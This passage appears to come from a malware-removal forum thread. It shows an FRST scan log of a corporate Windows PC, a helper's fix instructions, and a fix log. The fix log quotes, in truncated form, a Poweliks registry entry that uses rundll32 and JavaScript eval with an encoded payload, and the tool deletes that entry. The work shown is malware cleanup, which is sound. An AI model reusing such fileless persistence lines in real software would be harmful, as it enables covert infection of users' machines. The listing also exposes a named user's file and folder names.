2014-10-14 07:19 - 2012-08-10 09:41 - 00226008 _____ () C:\Users\boylem1\Documents\4th   Revised  Mike McAndrew Presentation - 8-10-12.pptx
2014-10-14 07:19 - 2012-08-10 09:03 - 00754176 _____ () C:\Users\boylem1\Documents\4th   Revised  Mike McAndrew Presentation - 8-10-12.ppt
2014-10-14 07:19 - 2012-08-09 16:01 - 00225960 _____ () C:\Users\boylem1\Documents\3 Revised  Mike McAndrew Presentation - 8-9-12.pptx
2014-10-14 07:19 - 2012-08-09 14:41 - 00754176 _____ () C:\Users\boylem1\Documents\3rd  Revised  Mike McAndrew Presentation - 8-9-12.ppt
2014-10-14 07:19 - 2012-08-09 14:39 - 00754176 _____ () C:\Users\boylem1\Documents\3rd Revised  Mike McAndrew Presentation - 8-9-12.ppt
2014-10-14 07:19 - 2012-07-17 09:57 - 00008344 _____ () C:\Users\boylem1\Documents\LIV - NEC Issues - July 2012.xlsx
2014-10-14 07:19 - 2012-04-25 08:35 - 00014262 _____ () C:\Users\boylem1\Documents\Colleges.xlsx
2014-10-14 07:19 - 2012-03-15 14:43 - 00011320 _____ () C:\Users\boylem1\Documents\Golf 2012  - Hotel.xlsx
2014-10-14 07:19 - 2012-03-15 14:35 - 00011161 _____ () C:\Users\boylem1\Documents\Golf 2012  - index.xlsx
2014-10-14 07:19 - 2012-03-08 13:39 - 00460288 _____ () C:\Users\boylem1\Documents\Copy of FTK - Ticket count 2012.xls
2014-10-14 07:19 - 2012-03-08 09:04 - 00068090 _____ () C:\Users\boylem1\Documents\Lunch Order Form.xlsx
2014-10-14 07:19 - 2012-02-20 15:13 - 00038400 _____ () C:\Users\boylem1\Documents\Copy of February 2012.xls
2014-10-14 07:19 - 2012-02-09 10:26 - 00038400 _____ () C:\Users\boylem1\Documents\Copy of January 2012 Commits and Bookings 2-7-12.xls
2014-10-14 07:19 - 2012-01-30 09:15 - 04822016 _____ () C:\Users\boylem1\Documents\Black Box Intro to Hebrew Healthcare   1-31-12 Final Vers.ppt
2014-10-14 07:19 - 2012-01-26 14:20 - 00309353 _____ () C:\Users\boylem1\Documents\Global Strength BB.pptx
2014-10-14 07:19 - 2012-01-12 08:13 - 00207360 _____ () C:\Users\boylem1\Documents\8 Mike M - Q3 1-12-11.ppt
2014-10-14 07:19 - 2012-01-12 08:11 - 00345600 _____ () C:\Users\boylem1\Documents\2 Islip - Q3 1-12-12.ppt
2014-10-14 07:19 - 2012-01-11 15:17 - 00475648 _____ () C:\Users\boylem1\Documents\6 Jim Shelby - Q3 1-12-11.ppt
2014-10-14 07:19 - 2012-01-11 15:16 - 00197120 _____ () C:\Users\boylem1\Documents\5 Jeff Jamison- Q3 1-12-12.ppt
2014-10-14 07:19 - 2011-12-05 10:09 - 00034718 _____ () C:\Users\boylem1\Documents\CELL PHONE 12-2011.xlsx
2014-10-14 07:19 - 2011-11-02 13:37 - 00228319 _____ () C:\Users\boylem1\Documents\Managed Services Vers 1.pptx
2014-10-14 07:19 - 2011-09-08 15:01 - 00250880 _____ () C:\Users\boylem1\Documents\Data Centric  Evaluation -3 slide Mike Mc.ppt
2014-10-14 07:19 - 2011-09-08 12:05 - 00250880 _____ () C:\Users\boylem1\Documents\Data Centric  Evaluation - DD  Sept. 2011.ppt
2014-10-14 07:19 - 2011-09-06 12:33 - 00231936 _____ () C:\Users\boylem1\Documents\Nashville Power Point.ppt
2014-10-14 07:19 - 2011-09-06 12:33 - 00231936 _____ () C:\Users\boylem1\Documents\Nashville  14 & 15 Power Point Sept 2011.ppt
2014-10-14 07:19 - 2011-07-19 15:00 - 00013456 _____ () C:\Users\boylem1\Documents\Albany Medical Pricing.xlsx
2014-10-14 07:19 - 2011-07-18 09:07 - 00011707 _____ () C:\Users\boylem1\Documents\Islip New Amityville Extensions.xlsx
2014-10-14 07:19 - 2011-07-18 09:04 - 00011717 _____ () C:\Users\boylem1\Documents\Islip New Amityville Extentions.xlsx
2014-10-14 07:19 - 2011-06-29 10:53 - 00110080 _____ () C:\Users\boylem1\Documents\Copy of AMC-VPI Software Maintenance Quote  6-16-11.xls
2014-10-14 07:19 - 2011-05-25 12:57 - 03348480 _____ () C:\Users\boylem1\Documents\Comview CHP Customer Presentation- vers 1 grey bk.ppt
2014-10-14 07:19 - 2011-05-25 11:46 - 03394048 _____ () C:\Users\boylem1\Documents\Comview CHP Customer Presentation- vers 2.ppt
2014-10-14 07:19 - 2011-05-25 11:41 - 03322368 _____ () C:\Users\boylem1\Documents\Comview CHP Customer Presentation-rev.ppt
2014-10-14 07:19 - 2011-05-18 14:53 - 62997504 _____ () C:\Users\boylem1\Documents\archive.pst
2014-10-14 07:19 - 2011-05-18 14:07 - 1391674368 _____ () C:\Users\boylem1\Documents\Personal Folders2.pst
2014-10-14 07:19 - 2011-05-18 13:40 - 1391674368 _____ () C:\Users\boylem1\Documents\Personal Folders.pst
2014-10-14 07:19 - 2011-05-18 13:20 - 00001992 ____H () C:\Users\boylem1\Documents\Default.rdp
2014-10-14 07:19 - 2010-07-29 10:32 - 00031744 _____ () C:\Users\boylem1\Documents\Copy of Cisco proj FY2010.xls
2014-10-14 07:19 - 2010-02-02 14:52 - 00027136 _____ () C:\Users\boylem1\Documents\mortgage 2010.xls
2014-10-14 07:19 - 2008-10-22 15:58 - 00044032 _____ () C:\Users\boylem1\Documents\OrgChart1.toc
2014-10-14 07:19 - 2007-10-25 10:10 - 00006831 _____ () C:\Users\boylem1\Documents\-.htm
2014-10-14 07:19 - 2007-07-06 07:59 - 00001804 _____ () C:\Users\boylem1\Documents\iTunes.lnk
2014-10-14 07:19 - 2006-04-21 08:07 - 13951112 _____ (Microsoft Corporation) C:\Users\boylem1\Documents\MPSetup.exe
2014-10-14 07:19 - 2006-04-13 11:33 - 00022450 _____ () C:\Users\boylem1\Documents\Mortgage WH
2014-10-14 07:18 - 2014-08-12 14:49 - 00034136 _____ () C:\Users\boylem1\Downloads\file_name.xls
2014-10-14 07:18 - 2014-06-24 11:20 - 31892616 _____ (Microsoft Corporation) C:\Users\boylem1\Downloads\EIE11_EN-US_WOL_WIN7.EXE
2014-10-14 07:18 - 2014-06-19 13:47 - 38494576 _____ (Apple Inc.) C:\Users\boylem1\Downloads\SafariSetup (1).exe
2014-10-14 07:18 - 2014-06-19 13:46 - 38494576 _____ (Apple Inc.) C:\Users\boylem1\Downloads\SafariSetup.exe
2014-10-14 07:18 - 2014-05-29 07:26 - 00002626 _____ () C:\Users\boylem1\Downloads\legitcheck.hta
2014-10-14 07:14 - 2014-10-14 07:14 - 00000000 ____D () C:\Users\boylem1\Desktop\Weekly Reports
2014-10-14 07:14 - 2014-10-14 07:14 - 00000000 ____D () C:\Users\boylem1\Desktop\Training
2014-10-14 07:14 - 2014-10-14 07:14 - 00000000 ____D () C:\Users\boylem1\Desktop\SHirts
2014-10-14 07:14 - 2014-10-14 07:14 - 00000000 ____D () C:\Users\boylem1\Desktop\Sales Commissions and YTD
2014-10-14 07:14 - 2014-10-14 07:14 - 00000000 ____D () C:\Users\boylem1\Desktop\Power Points
2014-10-14 07:13 - 2014-10-29 15:38 - 00000000 ____D () C:\Users\boylem1\Desktop\Jim McKenna
2014-10-14 07:13 - 2014-10-21 11:32 - 00000000 ____D () C:\Users\boylem1\Desktop\ORG Charts
2014-10-14 07:13 - 2014-10-17 08:54 - 00000000 ____D () C:\Users\boylem1\Desktop\ISO -Qtry Reports
2014-10-14 07:13 - 2014-10-14 07:14 - 00000000 ____D () C:\Users\boylem1\Desktop\Pic off camera
2014-10-14 07:13 - 2014-10-14 07:13 - 00000000 ____D () C:\Users\boylem1\Desktop\New folder
2014-10-14 07:13 - 2014-10-14 07:13 - 00000000 ____D () C:\Users\boylem1\Desktop\m& a BOOK
2014-10-14 07:13 - 2014-10-14 07:13 - 00000000 ____D () C:\Users\boylem1\Desktop\Kelly)
2014-10-14 07:13 - 2014-10-14 07:13 - 00000000 ____D () C:\Users\boylem1\Desktop\images
2014-10-14 07:12 - 2014-11-04 09:32 - 00000000 ____D () C:\Users\boylem1\Desktop\Dallas Cowboys vs Giants Oct.19
2014-10-14 07:12 - 2014-11-03 09:31 - 00000000 ____D () C:\Users\boylem1\Desktop\Check Request
2014-10-14 07:12 - 2014-10-31 15:37 - 00000000 ____D () C:\Users\boylem1\Desktop\Corp Pipelines
2014-10-14 07:12 - 2014-10-14 08:49 - 00000000 ____D () C:\Users\boylem1\Desktop\Contact List -Directory
2014-10-14 07:12 - 2014-10-14 08:11 - 00000000 ___RD () C:\Users\boylem1\Desktop\Icons
2014-10-14 07:12 - 2014-10-14 07:12 - 00000000 ____D () C:\Users\boylem1\Desktop\Forms
2014-10-14 07:12 - 2014-10-14 07:12 - 00000000 ____D () C:\Users\boylem1\Desktop\AP Signaute Cards
2014-10-14 07:12 - 2014-10-06 11:00 - 00084992 _____ () C:\Users\boylem1\Desktop\FY15 Largest Orders Template (2).xls
2014-10-14 07:12 - 2014-10-06 10:14 - 00018028 _____ () C:\Users\boylem1\Desktop\PM Inventorty - NACS 2014.xlsx
2014-10-14 07:12 - 2014-09-18 08:05 - 00061968 _____ () C:\Users\boylem1\Desktop\Sales Report-week ending 9-17-14 - Jim R.xlsx
2014-10-14 07:12 - 2014-09-15 12:43 - 00017784 _____ () C:\Users\boylem1\Desktop\YTD Bookings as of 9-15-14.xlsx
2014-10-14 07:12 - 2014-09-05 11:32 - 00658566 _____ () C:\Users\boylem1\Desktop\LIV July  Pipeline 8-1-14 - Master.xlsx
2014-10-14 07:12 - 2014-08-25 15:28 - 00011537 _____ () C:\Users\boylem1\Desktop\LIV TOP 5 Large Opportunities 8-25-14.xlsx
2014-10-14 07:12 - 2014-07-31 16:09 - 00116089 _____ () C:\Users\boylem1\Desktop\August  Pipeline 7-31-14.xlsx
2014-10-14 07:12 - 2014-07-21 16:11 - 00749568 _____ () C:\Users\boylem1\Desktop\Maintenance report NY Metro Team July-2014.xls
2014-10-14 07:12 - 2014-07-21 12:59 - 03306496 _____ () C:\Users\boylem1\Desktop\Maintenance Renewals.msg
2014-10-14 07:12 - 2014-07-09 13:55 - 00084992 _____ () C:\Users\boylem1\Desktop\FY15 Largest Orders  LIV.xls
2014-10-14 07:12 - 2014-07-08 14:00 - 00016855 _____ () C:\Users\boylem1\Desktop\Copy of FINAL -  CONSULTANT LIST  7-8-14.xlsx
2014-10-14 07:12 - 2014-07-03 09:59 - 00017635 _____ () C:\Users\boylem1\Desktop\LIV JUNE Pipeline.xlsx
2014-10-14 07:12 - 2014-07-03 09:57 - 00017022 _____ () C:\Users\boylem1\Desktop\July 3 Pipeline.xlsx
2014-10-14 07:12 - 2014-06-25 10:59 - 00014942 _____ () C:\Users\boylem1\Desktop\Co-Op End of May Report.pdf.xlsx
2014-10-14 07:12 - 2014-06-17 15:52 - 00120276 _____ () C:\Users\boylem1\Desktop\Forecast as of 6-17-14.xlsb
2014-10-14 07:12 - 2014-06-17 15:47 - 00121516 _____ () C:\Users\boylem1\Desktop\Forecast as of 6-17-14 w names.xlsb
2014-10-14 07:12 - 2014-06-17 15:37 - 00122736 _____ () C:\Users\boylem1\Desktop\Updated 0614 - June Pipeline.xlsb
2014-10-14 07:12 - 2014-06-17 15:29 - 00017401 _____ () C:\Users\boylem1\Desktop\June 2014  Forcast.xlsx
2014-10-14 07:12 - 2014-06-17 13:19 - 00013536 _____ () C:\Users\boylem1\Desktop\LI Team Bookings YTD 6-17-14.xlsx
2014-10-14 07:12 - 2014-05-21 08:07 - 00051306 _____ () C:\Users\boylem1\Desktop\NA-EXP-FOR001 Expense Reimbursement-dgm7.xlsx
2014-10-14 07:12 - 2014-04-15 07:38 - 00020483 _____ () C:\Users\boylem1\Desktop\Pipeline - AE's.xlsx
2014-10-14 07:12 - 2014-03-03 15:21 - 00016932 _____ () C:\Users\boylem1\Desktop\2013 Ending Mortgage Balance.xlsx
2014-10-14 07:12 - 2014-02-25 16:00 - 00015623 _____ () C:\Users\boylem1\Desktop\NY Tech shirts 12 19 13.xlsx
2014-10-14 07:12 - 2014-02-25 09:24 - 00010926 _____ () C:\Users\boylem1\Desktop\AMEX GC Tracking.xlsx
2014-10-14 07:12 - 2014-01-31 11:02 - 00016455 _____ () C:\Users\boylem1\Desktop\Corp Pipeline Feb. 2014.xlsx
2014-10-14 07:12 - 2014-01-07 12:33 - 00066048 _____ () C:\Users\boylem1\Desktop\Orlando FY14 Sales YTD Nov.xls
2014-10-14 07:12 - 2013-11-26 15:46 - 00124886 _____ () C:\Users\boylem1\Desktop\Orlando Updated 11-26-13 - December Pipeline.xlsb
2014-10-14 07:12 - 2013-11-01 08:40 - 00019426 _____ () C:\Users\boylem1\Desktop\Formated Nov pipeline  11-1-13.xlsx
2014-10-14 07:12 - 2012-08-23 15:40 - 00014021 ___SH () C:\Users\boylem1\Desktop\~WRL1943.tmp
2014-10-14 07:12 - 2008-12-22 12:56 - 00000203 _____ () C:\Users\boylem1\Desktop\Shortcut to BoyleM1$ on 'Exny01fp01' (U).lnk
2014-10-14 07:12 - 2006-07-27 14:58 - 00000200 _____ () C:\Users\boylem1\Desktop\T-Drive.lnk
2014-10-14 07:08 - 2014-10-14 07:08 - 00000000 ____D () C:\Users\boylem1\AppData\Roaming\WebEx Connect
2014-10-14 07:08 - 2014-10-14 07:08 - 00000000 ____D () C:\Users\boylem1\AppData\Roaming\Cisco
2014-10-14 07:08 - 2014-10-14 07:08 - 00000000 ____D () C:\Users\boylem1\AppData\Local\Cisco
2014-10-14 07:06 - 2014-10-17 05:08 - 00032154 _____ () C:\Windows\PFRO.log
2014-10-13 17:05 - 2014-10-13 17:05 - 00000000 ___SD () C:\Users\boylem1\Documents\My Shapes
2014-10-13 17:05 - 2014-10-13 17:05 - 00000000 ____D () C:\ProgramData\FLEXnet
2014-10-13 17:04 - 2014-10-13 17:04 - 00003029 _____ () C:\Users\boylem1\Desktop\Microsoft Outlook 2010.lnk
2014-10-13 17:04 - 2014-10-13 17:04 - 00002951 _____ () C:\Users\boylem1\Desktop\Microsoft Excel 2010.lnk
2014-10-13 17:04 - 2014-05-06 08:31 - 00001051 _____ () C:\Users\boylem1\Desktop\Documents - Shortcut.lnk
2014-10-13 16:57 - 2014-10-13 17:00 - 00000000 ____D () C:\Users\wilders\AppData\Roaming\Apple Computer
2014-10-13 16:57 - 2014-10-13 16:59 - 00111384 _____ () C:\Users\wilders\AppData\Local\GDIPFONTCACHEV1.DAT
2014-10-13 16:57 - 2014-10-13 16:57 - 00111384 _____ () C:\Windows\SysWOW64\GDIPFONTCACHEV1.DAT
2014-10-13 16:57 - 2014-10-13 16:57 - 00002740 __RSH () C:\Users\wilders\ntuser.pol
2014-10-13 16:57 - 2014-10-13 16:57 - 00001413 _____ () C:\Users\wilders\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Internet Explorer.lnk
2014-10-13 16:57 - 2014-10-13 16:57 - 00001087 _____ () C:\Users\wilders\Desktop\Mozilla Firefox.lnk
2014-10-13 16:57 - 2014-10-13 16:57 - 00000020 ___SH () C:\Users\wilders\ntuser.ini
2014-10-13 16:57 - 2014-10-13 16:57 - 00000000 ____D () C:\Users\wilders\AppData\Roaming\WebEx Connect
2014-10-13 16:57 - 2014-10-13 16:57 - 00000000 ____D () C:\Users\wilders\AppData\Roaming\Intel Corporation
2014-10-13 16:57 - 2014-10-13 16:57 - 00000000 ____D () C:\Users\wilders\AppData\Roaming\Cisco
2014-10-13 16:57 - 2014-10-13 16:57 - 00000000 ____D () C:\Users\wilders\AppData\Roaming\Adobe
2014-10-13 16:57 - 2014-10-13 16:57 - 00000000 ____D () C:\Users\wilders\AppData\Local\Symantec
2014-10-13 16:57 - 2014-10-13 16:57 - 00000000 ____D () C:\Users\wilders\AppData\Local\Google
2014-10-13 16:57 - 2014-10-13 16:57 - 00000000 ____D () C:\Users\wilders\AppData\Local\Citrix
2014-10-13 16:57 - 2014-10-13 16:57 - 00000000 ____D () C:\Users\wilders\AppData\Local\Adobe
2014-10-13 16:57 - 2014-10-13 16:25 - 00000000 ____D () C:\Users\wilders\AppData\Local\Cisco
2014-10-13 16:57 - 2014-09-26 15:30 - 00000000 ____D () C:\Users\wilders\AppData\Local\Microsoft Help
2014-10-13 16:57 - 2014-09-26 14:30 - 00000000 ____D () C:\Users\wilders\AppData\Roaming\ICAClient
2014-10-13 16:57 - 2009-07-13 23:54 - 00000000 ___RD () C:\Users\wilders\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Accessories
2014-10-13 16:57 - 2009-07-13 23:49 - 00000000 ___RD () C:\Users\wilders\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Maintenance
2014-10-13 16:56 - 2014-10-13 16:57 - 00000000 ____D () C:\Users\wilders
2014-10-13 16:55 - 2014-11-04 10:07 - 00006268 _____ () C:\Windows\setupact.log
2014-10-13 16:55 - 2014-10-13 16:55 - 00000000 _____ () C:\Windows\setuperr.log
2014-10-13 16:48 - 2014-11-03 10:40 - 00001476 _____ () C:\Users\boylem1\Desktop\Desktop.lnk
2014-10-13 16:48 - 2014-10-30 08:46 - 00000000 ____D () C:\Program Files (x86)\CTI Telephony
2014-10-13 16:48 - 2014-10-13 16:48 - 00000000 ____D () C:\Users\boylem1\AppData\Roaming\Telephony
2014-10-13 16:46 - 2014-10-13 16:46 - 00000000 ____D () C:\Program Files (x86)\Telephony
2014-10-13 16:42 - 2014-10-14 07:56 - 00000000 ____D () C:\Users\boylem1\AppData\Local\Adobe
2014-10-13 16:42 - 2008-04-07 04:38 - 00024416 ____R (Adobe Systems Inc.) C:\Windows\system32\AdobePDFUI.dll
2014-10-13 16:41 - 2014-10-13 16:41 - 00002465 _____ () C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Acrobat Distiller 9.lnk
2014-10-13 16:41 - 2014-10-13 16:41 - 00002453 _____ () C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Adobe Acrobat 9 Pro.lnk
2014-10-13 16:41 - 2014-10-13 16:41 - 00002171 _____ () C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Adobe LiveCycle Designer ES 8.2.lnk
2014-10-13 16:41 - 2014-10-13 16:41 - 00002021 _____ () C:\Users\Public\Desktop\Adobe Acrobat 9 Pro.lnk
2014-10-13 16:35 - 2014-10-17 09:05 - 00000000 ____D () C:\Users\boylem1\AppData\Roaming\Apple Computer
2014-10-13 16:35 - 2014-10-13 16:35 - 00000000 ____D () C:\Users\boylem1\AppData\Local\Apple Computer
2014-10-13 16:34 - 2014-10-17 08:22 - 00000000 ____D () C:\ProgramData\34BE82C4-E596-4e99-A191-52C6199EBF69
2014-10-13 16:34 - 2014-10-13 16:34 - 00000000 ____D () C:\ProgramData\Apple Computer
2014-10-13 16:34 - 2012-08-21 12:01 - 00033240 _____ (GEAR Software Inc.) C:\Windows\system32\Drivers\GEARAspiWDM.sys
2014-10-13 16:33 - 2014-10-17 08:22 - 00000000 ____D () C:\Program Files\Common Files\Apple
2014-10-13 16:33 - 2014-10-13 16:33 - 00002519 _____ () C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Apple Software Update.lnk
2014-10-13 16:33 - 2014-10-13 16:33 - 00000000 ____D () C:\Windows\System32\Tasks\Apple
2014-10-13 16:33 - 2014-10-13 16:33 - 00000000 ____D () C:\Users\boylem1\AppData\Local\Apple
2014-10-13 16:33 - 2014-10-13 16:33 - 00000000 ____D () C:\ProgramData\Apple
2014-10-13 16:33 - 2014-10-13 16:33 - 00000000 ____D () C:\Program Files\Bonjour
2014-10-13 16:33 - 2014-10-13 16:33 - 00000000 ____D () C:\Program Files (x86)\Bonjour
2014-10-13 16:33 - 2014-10-13 16:33 - 00000000 ____D () C:\Program Files (x86)\Apple Software Update
2014-10-13 16:30 - 2014-10-17 05:15 - 00000039 _____ () C:\Windows\vbaddin.ini
2014-10-13 16:25 - 2014-10-13 16:25 - 00000000 ____D () C:\Users\Default\AppData\Local\Cisco
2014-10-13 16:25 - 2014-10-13 16:25 - 00000000 ____D () C:\Users\Default User\AppData\Local\Cisco
2014-10-13 16:24 - 2014-10-13 16:24 - 00002182 _____ () C:\Users\Public\Desktop\Cisco Jabber.lnk
2014-10-13 16:24 - 2014-10-13 16:24 - 00000000 ____D () C:\ProgramData\Plantronics
2014-10-13 16:24 - 2014-10-13 16:24 - 00000000 ____D () C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Cisco Jabber
2014-10-13 16:24 - 2014-10-13 16:24 - 00000000 ____D () C:\ProgramData\Cisco Systems
2014-10-13 16:24 - 2014-10-13 16:24 - 00000000 ____D () C:\Program Files (x86)\Cisco Systems
2014-10-13 16:22 - 2014-11-04 11:26 - 00000900 _____ () C:\Windows\Tasks\GoogleUpdateTaskMachineUA.job
2014-10-13 16:22 - 2014-11-04 10:07 - 00000896 _____ () C:\Windows\Tasks\GoogleUpdateTaskMachineCore.job
2014-10-13 16:22 - 2014-10-27 15:28 - 00002183 _____ () C:\Users\Public\Desktop\Google Chrome.lnk
2014-10-13 16:22 - 2014-10-13 16:22 - 00003896 _____ () C:\Windows\System32\Tasks\GoogleUpdateTaskMachineUA
2014-10-13 16:22 - 2014-10-13 16:22 - 00003644 _____ () C:\Windows\System32\Tasks\GoogleUpdateTaskMachineCore
2014-10-13 16:22 - 2014-10-13 16:22 - 00000000 ____D () C:\Users\boylem1\AppData\Local\Google
2014-10-13 16:22 - 2014-10-13 16:22 - 00000000 ____D () C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Google Chrome
2014-10-13 16:22 - 2014-10-13 16:22 - 00000000 ____D () C:\Program Files (x86)\Google
2014-10-13 16:20 - 2014-10-13 16:20 - 00002441 _____ () C:\Users\boylem1\Desktop\Adobe Reader XI.lnk
2014-10-13 16:19 - 2014-11-03 09:01 - 00000840 _____ () C:\Users\Public\Desktop\Speccy.lnk
2014-10-13 16:19 - 2014-10-13 16:19 - 00000000 ____D () C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Speccy
2014-10-13 16:19 - 2014-10-13 16:19 - 00000000 ____D () C:\Program Files\Speccy
2014-10-13 16:18 - 2014-11-03 09:01 - 00000866 _____ () C:\Users\Public\Desktop\CCleaner.lnk
2014-10-13 16:18 - 2014-10-13 16:18 - 04965896 _____ (Piriform Ltd) C:\Users\boylem1\Downloads\ccsetup418.exe
2014-10-13 16:18 - 2014-10-13 16:18 - 00002776 _____ () C:\Windows\System32\Tasks\CCleanerSkipUAC
2014-10-13 16:18 - 2014-10-13 16:18 - 00000000 ____D () C:\ProgramData\Microsoft\Windows\Start Menu\Programs\CCleaner
2014-10-13 16:18 - 2014-10-13 16:18 - 00000000 ____D () C:\Program Files\CCleaner
2014-10-13 16:17 - 2014-10-13 16:17 - 00000000 ____D () C:\Program Files (x86)\Mozilla Firefox
2014-10-13 16:15 - 2014-10-13 16:15 - 00002740 __RSH () C:\Users\boylem1\ntuser.pol

==================== One Month Modified Files and Folders =======

(If an entry is included in the fixlist, the file\folder will be moved.)

2014-11-04 11:26 - 2014-09-26 14:23 - 00000232 _____ () C:\Windows\system32\config\netlogon.ftl
2014-11-04 11:25 - 2014-09-26 12:44 - 01749179 _____ () C:\Windows\WindowsUpdate.log
2014-11-04 11:00 - 2014-09-26 14:36 - 00000830 _____ () C:\Windows\Tasks\Adobe Flash Player Updater.job
2014-11-04 10:15 - 2009-07-13 23:45 - 00022224 ____H () C:\Windows\system32\7B296FB0-376B-497e-B012-9C450E1B7327-5P-1.C7483456-A289-439d-8115-601632D005A0
2014-11-04 10:15 - 2009-07-13 23:45 - 00022224 ____H () C:\Windows\system32\7B296FB0-376B-497e-B012-9C450E1B7327-5P-0.C7483456-A289-439d-8115-601632D005A0
2014-11-04 10:07 - 2009-07-14 00:08 - 00000006 ____H () C:\Windows\Tasks\SA.DAT
2014-11-04 10:05 - 2009-07-14 00:13 - 00786622 _____ () C:\Windows\system32\PerfStringBackup.INI
2014-10-30 15:23 - 2009-07-13 22:20 - 00000000 ____D () C:\Windows\LiveKernelReports
2014-10-29 01:00 - 2014-09-26 14:36 - 00701104 _____ (Adobe Systems Incorporated) C:\Windows\SysWOW64\FlashPlayerApp.exe
2014-10-29 01:00 - 2014-09-26 14:36 - 00071344 _____ (Adobe Systems Incorporated) C:\Windows\SysWOW64\FlashPlayerCPLApp.cpl
2014-10-29 01:00 - 2014-09-26 14:36 - 00003768 _____ () C:\Windows\System32\Tasks\Adobe Flash Player Updater
2014-10-28 16:06 - 2014-10-01 11:04 - 00000000 ____D () C:\ProgramData\Citrix
2014-10-22 13:16 - 2014-10-01 08:59 - 00000000 ____D () C:\Users\boylem1\AppData\Roaming\Adobe
2014-10-17 11:01 - 2014-09-26 15:30 - 00000000 ____D () C:\ProgramData\Microsoft Help
2014-10-17 05:09 - 2012-02-14 12:14 - 00000000 ____D () C:\Windows\Panther
2014-10-17 05:09 - 2009-07-13 23:45 - 00404784 _____ () C:\Windows\system32\FNTCACHE.DAT
2014-10-17 05:06 - 2014-09-30 15:33 - 00000000 ___SD () C:\Windows\system32\CompatTel
2014-10-17 05:05 - 2009-07-13 21:34 - 00000478 _____ () C:\Windows\win.ini
2014-10-14 23:15 - 2014-10-01 08:59 - 00000000 ____D () C:\Users\boylem1\AppData\Roaming\ICAClient
2014-10-14 08:24 - 2009-07-13 22:20 - 00000000 __RHD () C:\Users\Public\Libraries
2014-10-14 08:19 - 2009-07-14 00:09 - 00000000 ____D () C:\Windows\System32\Tasks\WPD
2014-10-14 07:51 - 2009-07-13 23:57 - 00001547 _____ () C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Windows Media Player.lnk
2014-10-14 07:06 - 2014-09-26 14:47 - 00000000 ____D () C:\Program Files (x86)\Mozilla Maintenance Service
2014-10-13 16:57 - 2014-09-30 15:39 - 00000000 ____D () C:\Windows\system32\appmgmt
2014-10-13 16:47 - 2014-10-01 08:59 - 00111384 _____ () C:\Users\boylem1\AppData\Local\GDIPFONTCACHEV1.DAT
2014-10-13 16:42 - 2014-09-26 14:44 - 00000000 ____D () C:\ProgramData\Adobe
2014-10-13 16:40 - 2014-09-26 14:44 - 00000000 ____D () C:\Program Files (x86)\Adobe
2014-10-13 16:31 - 2014-10-01 10:16 - 00000000 ____D () C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Microsoft Office
2014-10-13 16:22 - 2014-09-26 12:46 - 00000000 ____D () C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Symantec
2014-10-13 16:22 - 2014-09-26 12:46 - 00000000 ____D () C:\Program Files\Common Files\Altiris
2014-10-13 16:15 - 2014-10-01 08:59 - 00000000 ____D () C:\Users\boylem1
2014-10-13 16:14 - 2014-09-26 12:46 - 00000000 ____D () C:\Program Files\Altiris

==================== Bamital & volsnap Check =================

(There is no automatic fix for files that do not pass verification.)

C:\Windows\System32\winlogon.exe => File is digitally signed
C:\Windows\System32\wininit.exe => File is digitally signed
C:\Windows\SysWOW64\wininit.exe => File is digitally signed
C:\Windows\explorer.exe => File is digitally signed
C:\Windows\SysWOW64\explorer.exe => File is digitally signed
C:\Windows\System32\svchost.exe => File is digitally signed
C:\Windows\SysWOW64\svchost.exe => File is digitally signed
C:\Windows\System32\services.exe => File is digitally signed
C:\Windows\System32\User32.dll => File is digitally signed
C:\Windows\SysWOW64\User32.dll => File is digitally signed
C:\Windows\System32\userinit.exe => File is digitally signed
C:\Windows\SysWOW64\userinit.exe => File is digitally signed
C:\Windows\System32\rpcss.dll => File is digitally signed
C:\Windows\System32\Drivers\volsnap.sys => File is digitally signed


LastRegBack: 2014-10-28 13:13

==================== End Of Log ============================



#4 B-boy/StyLe/

B-boy/StyLe/

    Bleepin' Freestyler


  • Malware Response Team
  • 8,307 posts
  • OFFLINE
  •  
  • Gender:Male
  • Location:Bulgaria
  • Local time:11:41 PM

Posted 05 November 2014 - 04:41 PM

Hi,
 
 
Please download the following file => [attachment=157407:fixlist.txt] and save it to the Desktop.
NOTE. It's important that both files, FRST and fixlist.txt are in the same location or the fix will not work.

Run FRST and press the Fix button just once and wait.
The tool will make a log on the Desktop (Fixlog.txt). Please post it to your reply.
 
 
Regards,
Georgi


cXfZ4wS.png


#5 Shate'

Shate'
  • Topic Starter

  • Members
  • 72 posts
  • OFFLINE
  •  
  • Local time:03:41 PM

Posted 05 November 2014 - 05:27 PM

Fix result of Farbar Recovery Tool (FRST written by Farbar) (x64) Version: 04-11-2014
Ran by boylem1 at 2014-11-05 17:17:35 Run:1
Running from C:\Users\boylem1\Desktop
Loaded Profiles: wilders & boylem1 & csadmin & PCAdmin (Available profiles: wilders & boylem1 & csadmin & PCAdmin)
Boot Mode: Normal
==============================================

Content of fixlist:
*****************
start
HKLM-x32\...\Run: [] => [X]
HKU\S-1-5-21-19809612-450918713-1538882281-8083\...A8F59079A8D5}\localserver32: rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";eval("epdvnfou/xsjuf)(=tdsjqu!mbohvbhf>ktds (the data entry has 239 more characters). <==== Poweliks!
HKU\S-1-5-21-19809612-450918713-1538882281-8083\SOFTWARE\Policies\Microsoft\Internet Explorer: Policy restriction <======= ATTENTION
emptytemp:
end
*****************

HKLM\Software\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\\ => value deleted successfully.
"HKU\S-1-5-21-19809612-450918713-1538882281-8083\Software\Classes\CLSID\{AB8902B4-09CA-4bb6-B78D-A8F59079A8D5}\localserver32" => Key Deleted Successfully.
"HKU\S-1-5-21-19809612-450918713-1538882281-8083\Software\Classes\CLSID\{AB8902B4-09CA-4bb6-B78D-A8F59079A8D5}" => Key deleted successfully.
"HKU\S-1-5-21-19809612-450918713-1538882281-8083\SOFTWARE\Policies\Microsoft\Internet Explorer" => Key deleted successfully.
EmptyTemp: => Removed 2.3 GB temporary data.


